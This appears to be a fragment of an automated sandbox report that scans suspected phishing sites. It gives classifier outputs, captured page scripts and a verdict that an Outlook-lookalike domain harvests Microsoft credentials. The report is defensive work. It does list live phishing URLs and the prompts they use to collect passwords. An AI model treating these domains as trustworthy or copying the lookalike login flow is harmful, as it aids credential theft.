uATePHronVs723nhfn5-f_OUoFmMnPE5mWVglasYlQkbp3-BkfEFI-MtJkH_onTPlPBit9SU1KLEksz8vAssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBdrqtsDtY6XvebctrJtuPNugwHCKVb_Q26sgpSAgzEg_sSit2NMjPTLcLT3ArdA_28c7wsMnt9jT08tSO8o7Uz_Z1tLKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EH3885u4_c3HDunccrfp28xETPXFeL0lA3r8BUp8LQ0HInw8RE1_zy8jCfoHSXwCJfi0z3CI-cbHdH2w0CDA8EGAA1\u0026estsfed=1\u0026uaid=4be1e2ec7d6d439ba1bf0f0f4f376452\u0026fci=https%3a%2f%2fportal.microsoftonline.com.orgid.com\u0026idp_hint=github.com","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~Grenada~1!!!GP~Guadeloupe~590!!!GU~Guam~1!!!GT~Guatemala~502!!!GG~Guernsey~44!!!GN~Guinea~224!!!GW~Guinea-Bissau~245!!!GY~Guyana~592!!!HT~Haiti~509!!!HN~Honduras~504!!!HK~Hong Kong SAR~ |
| URL: https://push.smtmarking.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://outblook.divergenty.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://push.smtmarking.com/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://outblook.divergenty.com/ Model: Joe Sandbox AI | {
"brands": [
"Vercel"
]
} |
|
| URL: https://push.smtmarking.com/assets/index-CeAdh7EY.... Model: Joe Sandbox AI | ```json
{
"risk_score": 2,
"reasoning": "The script uses fetch to load resources specified by 'link' elements with 'modulepreload' relation, which is a moderate-risk indicator due to external data transmission. However, it does not exhibit high-risk behaviors like dynamic code execution or data exfiltration. The script appears to be part of a legitimate library (Vue.js), which aligns with typical module preloading functionality, suggesting a benign intent."
} |
(function(){const t=document.createElement("link").relList;if(t&&t.supports&&t.supports("modulepreload"))return;for(const s of document.querySelectorAll('link[rel="modulepreload"]'))r(s);new MutationObserver(s=>{for(const i of s)if(i.type==="childList")for(const o of i.addedNodes)o.tagName==="LINK"&&o.rel==="modulepreload"&&r(o)}).observe(document,{childList:!0,subtree:!0});function n(s){const i={};return s.integrity&&(i.integrity=s.integrity),s.referrerPolicy&&(i.referrerPolicy=s.referrerPolicy),s.crossOrigin==="use-credentials"?i.credentials="include":s.crossOrigin==="anonymous"?i.credentials="omit":i.credentials="same-origin",i}function r(s){if(s.ep)return;s.ep=!0;const i=n(s);fetch(s.href,i)}})();/**
* @vue/shared v3.5.13
* (c) 2018-present Yuxi (Evan) You and Vue contributors
* @license MIT
**//*! #__NO_SIDE_EFFECTS__ */function Er(e){const t=Object.create(null);for(const n of e.split(","))t[n]=1;return n=>n in t}const Y={},It=[],De=()=>{},Bo=()=>!1,En=e=>e.charCodeAt(0)===111&&e.charCodeAt(1)===110&&(e.charCodeAt(2)>122||e.charCodeAt(2)<97),Cr=e=>e.startsWith("onUpdate:"),de=Object.assign,Tr=(e,t)=>{const n=e.indexOf(t);n>-1&&e.splice(n,1)},ko=Object.prototype.hasOwnProperty,Z=(e,t)=>ko.call(e,t),W=Array.isArray,Nt=e=>Cn(e)==="[object Map]",Ho=e=>Cn(e)==="[object Set]",V=e=>typeof e=="function",ne=e=>typeof e=="string",_t=e=>typeof e=="symbol",Q=e=>e!==null&&typeof e=="object",ii=e=>(Q(e)||V(e))&&V(e.then)&&V(e.catch),Uo=Object.prototype.toString,Cn=e=>Uo.call(e),Zo=e=>Cn(e).slice(8,-1),Go=e=>Cn(e)==="[object Object]",Ar=e=>ne(e)&&e!=="NaN"&&e[0]!=="-"&&""+parseInt(e,10)===e,Dt=Er(",key,ref,ref_for,ref_key,onVnodeBeforeMount,onVnodeMounted,onVnodeBeforeUpdate,onVnodeUpdated,onVnodeBeforeUnmount,onVnodeUnmounted"),Tn=e=>{const t=Object.create(null);return n=>t[n]||(t[n]=e(n))},zo=/-(\w)/g,qe=Tn(e=>e.replace(zo,(t,n)=>n?n.toUpperCase():"")),Jo=/\B([A-Z])/g,pt=Tn(e=>e.replace(Jo,"-$1").toLowerCase()),oi=Tn(e=>e.charAt(0).toUpperCase()+e.slice(1)),kn=Tn(e=>e?`on${oi(e)}`:""),Ke=(e,t)=>!Object.is(e,t),Hn=(e,...t)=>{for(let n=0;n<e.length;n++)e[n](...t)},ai=(e,t,n,r=!1)=>{Object.defineProperty(e,t,{configurable:!0,enumerable:!1,writable:r,value:n})},Xo=e=>{const t=parseFloat(e);return isNaN(t)?e:t};let ss;const An=()=>ss||(ss=typeof globalThis<"u"?globalThis:typeof self<"u"?self:typeof window<"u"?window:typeof global<"u"?global:{});function Or(e){if(W(e)){const t={};for(let n=0;n<e.length;n++){const r=e[n],s=ne(r)?qo(r):Or(r);if(s)for(const i in s)t[i]=s[i]}return t}else if(ne(e)||Q(e))return e}const Yo=/;(?![^(]*\))/g,$o=/:([^]+)/,Ko=/\/\*[^]*?\*\//g;function qo(e){const t={};return e.replace(Ko,"").split(Yo).forEach(n=>{if(n){const r=n.split($o);r.length>1&&(t[r[0].trim()]=r[1].trim())}}),t}function Lr(e){let t="";if(ne(e))t=e;else if(W(e))for(let n=0;n<e.length;n++){const r=Lr(e[n]);r&&(t+=r+" ")}else if(Q(e))for(const n in e)e[n]&&(t+=n+" ");return t.trim()}const Qo="itemscope,allowfullscreen,formnovalidate,ismap,nomodule,novalidate,readonly",ea=Er(Qo);function ci(e){return!!e||e===""}/**
* @vue/reactivity v3.5.13
* (c) 2018-present Yuxi (Evan) You and Vue contributors
* @license MIT
**/let ve;class ta{constructor(t=!1){this.detached=t,this._active=!0,this.effects=[],this.cleanups=[],this._isPaused=!1,this.parent=ve,!t&&ve&&(this.index=(ve.scopes||(ve.scopes=[])).push(this)-1)}get active(){return this._active}pause(){if(this._active){this._isPaused=!0;let t,n;if(this.scopes)for(t=0,n=this.scopes.length;t<n;t++)this.scopes[t].pause();for(t=0,n=this.effects.length;t<n;t++)this.effects[t].pause()}}resume(){if(this._active&&this._isPaused){this._isPaused=!1;let t,n;if(this.scopes)for(t=0,n=this.scopes.length;t<n;t++)this.scopes[t].resume();for(t=0,n=this.effects.length;t<n;t++)this.effects[t].resume()}}run(t){if(this._active){const n=ve;try{return ve=this,t()}finally{ve=n}}}on(){ve=this}off(){ve=this.parent}stop(t){if(this._active){this._active=!1;let n,r;for(n=0,r=this.effects.length;n<r;n++)this.effects[n].stop();for(this.effect |
| URL: https://ss.nemolightlng.com/... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script primarily involves DOM manipulation and event handling, with no clear indicators of malicious behavior. It uses legacy practices and error logging, but there is no evidence of data exfiltration or dynamic code execution. The script appears to be a placeholder or utility script with benign intent."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+v.length).toLowerCase()===v}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("integrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
| URL: https://outblook.divergenty.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify email to proceed",
"prominent_button_name": "Next",
"text_input_field_labels": [
"pvpeh9@redci.net"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://outblook.divergenty.com/_next/static/chunk... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script uses XMLHttpRequest to send data, which is a moderate-risk indicator. However, there is no evidence of dynamic code execution, data exfiltration, or interaction with suspicious domains. The script appears to be part of a library (likely Axios) for handling HTTP requests, which is a common and legitimate use case. Therefore, the risk score is capped at 3 for containing only moderate-risk practices without clear malicious intent."
} |
(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[505],{2505:(e,t,r)=>{e.exports=r(8015)},5592:(e,t,r)=>{"use strict";var n=r(9516),o=r(7522),s=r(3948),i=r(9106),a=r(9615),u=r(2012),c=r(4202),f=r(7763);e.exports=function(e){return new Promise(function(t,r){var p=e.data,l=e.headers,d=e.responseType;n.isFormData(p)&&delete l["Content-Type"];var h=new XMLHttpRequest;if(e.auth){var m=e.auth.username||"",g=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";l.Authorization="Basic "+btoa(m+":"+g)}var v=a(e.baseURL,e.url);function y(){if(h){var n="getAllResponseHeaders"in h?u(h.getAllResponseHeaders()):null;o(t,r,{data:d&&"text"!==d&&"json"!==d?h.response:h.responseText,status:h.status,statusText:h.statusText,headers:n,config:e,request:h}),h=null}}if(h.open(e.method.toUpperCase(),i(v,e.params,e.paramsSerializer),!0),h.timeout=e.timeout,"onloadend"in h?h.onloadend=y:h.onreadystatechange=function(){h&&4===h.readyState&&(0!==h.status||h.responseURL&&0===h.responseURL.indexOf("file:"))&&setTimeout(y)},h.onabort=function(){h&&(r(f("Request aborted",e,"ECONNABORTED",h)),h=null)},h.onerror=function(){r(f("Network Error",e,null,h)),h=null},h.ontimeout=function(){var t="timeout of "+e.timeout+"ms exceeded";e.timeoutErrorMessage&&(t=e.timeoutErrorMessage),r(f(t,e,e.transitional&&e.transitional.clarifyTimeoutError?"ETIMEDOUT":"ECONNABORTED",h)),h=null},n.isStandardBrowserEnv()){var b=(e.withCredentials||c(v))&&e.xsrfCookieName?s.read(e.xsrfCookieName):void 0;b&&(l[e.xsrfHeaderName]=b)}"setRequestHeader"in h&&n.forEach(l,function(e,t){void 0===p&&"content-type"===t.toLowerCase()?delete l[t]:h.setRequestHeader(t,e)}),n.isUndefined(e.withCredentials)||(h.withCredentials=!!e.withCredentials),d&&"json"!==d&&(h.responseType=e.responseType),"function"==typeof e.onDownloadProgress&&h.addEventListener("progress",e.onDownloadProgress),"function"==typeof e.onUploadProgress&&h.upload&&h.upload.addEventListener("progress",e.onUploadProgress),e.cancelToken&&e.cancelToken.promise.then(function(e){h&&(h.abort(),r(e),h=null)}),p||(p=null),h.send(p)})}},8015:(e,t,r)=>{"use strict";var n=r(9516),o=r(9012),s=r(5155),i=r(5343);function a(e){var t=new s(e),r=o(s.prototype.request,t);return n.extend(r,s.prototype,t),n.extend(r,t),r}var u=a(r(6987));u.Axios=s,u.create=function(e){return a(i(u.defaults,e))},u.Cancel=r(1928),u.CancelToken=r(3191),u.isCancel=r(3864),u.all=function(e){return Promise.all(e)},u.spread=r(7980),u.isAxiosError=r(5019),e.exports=u,e.exports.default=u},1928:e=>{"use strict";function t(e){this.message=e}t.prototype.toString=function(){return"Cancel"+(this.message?": "+this.message:"")},t.prototype.__CANCEL__=!0,e.exports=t},3191:(e,t,r)=>{"use strict";var n=r(1928);function o(e){if("function"!=typeof e)throw TypeError("executor must be a function.");this.promise=new Promise(function(e){t=e});var t,r=this;e(function(e){r.reason||(r.reason=new n(e),t(r.reason))})}o.prototype.throwIfRequested=function(){if(this.reason)throw this.reason},o.source=function(){var e;return{token:new o(function(t){e=t}),cancel:e}},e.exports=o},3864:e=>{"use strict";e.exports=function(e){return!!(e&&e.__CANCEL__)}},5155:(e,t,r)=>{"use strict";var n=r(9516),o=r(9106),s=r(3471),i=r(4490),a=r(5343),u=r(4841),c=u.validators;function f(e){this.defaults=e,this.interceptors={request:new s,response:new s}}f.prototype.request=function(e){"string"==typeof e?(e=arguments[1]||{},e.url=arguments[0]):e=e||{},(e=a(this.defaults,e)).method?e.method=e.method.toLowerCase():this.defaults.method?e.method=this.defaults.method.toLowerCase():e.method="get";var t,r=e.transitional;void 0!==r&&u.assertOptions(r,{silentJSONParsing:c.transitional(c.boolean,"1.0.0"),forcedJSONParsing:c.transitional(c.boolean,"1.0.0"),clarifyTimeoutError:c.transitional(c.boolean,"1.0.0")},!1);var n=[],o=!0;this.interceptors.request.forEach(function(t){("function"!=typeof t.runWhen||!1!==t.runWhen(e))&&(o=o&&t.synchronous,n.unshift(t.fulfilled,t.rejected))});var s=[];if(this.interceptors.response.forEac |
| URL: https://outblook.divergenty.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Outlook"
]
} |
|
| URL: https://outblook.divergenty.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Validate email password to continue",
"prominent_button_name": "Validate",
"text_input_field_labels": [
"pvpeh9@redci.net"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://ss.nemolightlng.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://ss.nemolightlng.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://outblook.divergenty.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"Outlook"
]
} |
|
| URL: https://ss.nemolightlng.com/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://outblook.divergenty.com/ Model: Joe Sandbox AI | ```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and is associated with the legitimate domain 'outlook.com'.", "The URL 'outblook.divergenty.com' contains a misspelling of 'outlook', which is a common phishing tactic.", "The domain 'divergenty.com' does not match the legitimate domain 'outlook.com' associated with Microsoft.", "The presence of a misspelled brand name in the subdomain suggests an attempt to deceive users.", "The email domain 'redci.net' does not match any known Microsoft domains, adding to the suspicion." ], "riskscore": 9}
Google indexed: False |
URL: outblook.divergenty.com
Brands: Microsoft
Input Fields: pvpeh9@redci.net |
| URL: https://ss.nemolightlng.com/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://outblook.divergenty.com/ Model: Joe Sandbox AI | ```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and is associated with the legitimate domain 'outlook.com'.", "The URL 'outblook.divergenty.com' contains a misspelling of 'outlook', which is a common phishing tactic.", "The domain 'divergenty.com' does not match the legitimate domain 'outlook.com' associated with Microsoft.", "The presence of a misspelled brand name in the subdomain suggests an attempt to deceive users.", "The email domain 'redci.net' does not match any known Microsoft domains, adding to the suspicion." ], "riskscore": 9}
Google indexed: False |
URL: outblook.divergenty.com
Brands: Microsoft
Input Fields: pvpeh9@redci.net |
| URL: https://ss.nemolightlng.com/?sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "software download portal"
} |
|
Edit tour
chrome.exe (PID: 1228 cmdline: 
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet
